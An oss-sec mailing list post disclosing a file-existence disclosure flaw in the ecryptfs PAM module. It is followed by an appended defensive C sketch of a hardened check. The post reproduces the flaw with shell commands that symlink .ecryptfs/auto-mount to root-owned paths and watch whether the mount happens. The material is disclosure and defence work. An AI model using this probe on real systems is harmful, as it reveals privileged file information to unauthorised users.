oss-sec mailing list archives
Re: Re: ecryptfs headsup
From: "Jason A. Donenfeld" <Jason () zx2c4 com>
Date: Sat, 14 Jul 2012 09:18:27 +0200
Looks like another issue with that pam module. I can determine whether or not any file exists as an unprivileged user:

We make sure that we have an existing root file and a non-existing root file:

zx2c4@bwog ~ $ sudo touch /root/this-file-exists
zx2c4@bwog ~ $ sudo rm -f /root/this-file-does-not-exist

We double check that zx2c4 can't know about them:

zx2c4@bwog ~ $ stat /root/this-file-exists
stat: cannot stat `/root/this-file-exists': Permission denied
zx2c4@bwog ~ $ stat /root/this-file-does-not-exist
stat: cannot stat `/root/this-file-does-not-exist': Permission denied
zx2c4@bwog ~ $ ls /root
ls: cannot open directory /root: Permission denied

We replace .ecryptfs/auto-mount with a symlink to a root file that does not exist:

zx2c4@bwog ~ $ rm -f .ecryptfs/auto-mount
zx2c4@bwog ~ $ ln -s /root/this-file-does-not-exist .ecryptfs/auto-mount

And we see that our private directory doesn't get mounted:

zx2c4@bwog ~ $ sudo login zx2c4
Password:
Last login: Sat Jul 14 03:07:33 EDT 2012 on pts/5
zx2c4@bwog ~ $ mount|grep ecrypt
zx2c4@bwog ~ $ exit

We next replace .ecryptfs/auto-mount with a symlink to a root file that *does* exist:

zx2c4@bwog ~ $ rm -f .ecryptfs/auto-mount
zx2c4@bwog ~ $ ln -s /root/this-file-exists .ecryptfs/auto-mount

And we see that it does in fact get mounted:

zx2c4@bwog ~ $ sudo login zx2c4
Password:
Last login: Sat Jul 14 03:09:10 EDT 2012 on pts/5
zx2c4@bwog ~ $ mount|grep ecrypt
/home/zx2c4/.Private on /home/zx2c4/Private type ecryptfs (ecryptfs_check_dev_ruid,ecryptfs_sig=e38bb31e419c9f03,ecryptfs_fnek_sig=5e2b499985de965d,ecryptfs_cipher=aes,ecryptfs_key_bytes=16,ecryptfs_unlink_sigs)

File existence disclosure.
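A defensive sketch of the check, added here as an example and not taken from the post or from ecryptfs-utils: the function names are hypothetical, and the first function is only an assumed model of a symlink-following existence test run with privilege. The hardened variant refuses a symlink at the flag-file path and accepts only a regular file owned by the user who is logging in.

```c
#define _GNU_SOURCE
#include <fcntl.h>
#include <stdio.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

/* Assumed model of the check the post probes: stat() follows symlinks, so
 * a privileged caller reports whether the link *target* exists. */
static int flag_present_following(const char *path)
{
    struct stat st;
    return stat(path, &st) == 0;
}

/* Hypothetical hardened check (not ecryptfs-utils code): true only for a
 * regular file owned by `owner`, never for a symlink at `path`. */
static int flag_present_hardened(const char *path, uid_t owner)
{
    struct stat st;
    int ok = 0;
    /* O_NOFOLLOW: open() fails with ELOOP if the last component is a
     * symlink; O_NONBLOCK: do not hang if the user planted a FIFO. */
    int fd = open(path, O_RDONLY | O_NOFOLLOW | O_NONBLOCK | O_CLOEXEC);
    if (fd < 0)
        return 0;
    /* fstat() the descriptor already held, so the object cannot be
     * swapped between the check and its result. */
    if (fstat(fd, &st) == 0 && S_ISREG(st.st_mode) && st.st_uid == owner)
        ok = 1;
    close(fd);
    return ok;
}

int main(int argc, char **argv)
{
    if (argc != 2) {
        fprintf(stderr, "usage: %s <path-to-flag-file>\n", argv[0]);
        return 2;
    }
    printf("following: %d\n", flag_present_following(argv[1]));
    printf("hardened:  %d\n", flag_present_hardened(argv[1], geteuid()));
    return 0;
}
```

Running the existence test only after switching to the target user's credentials removes the privileged oracle altogether; the ownership check is the fallback when the test has to stay in privileged code.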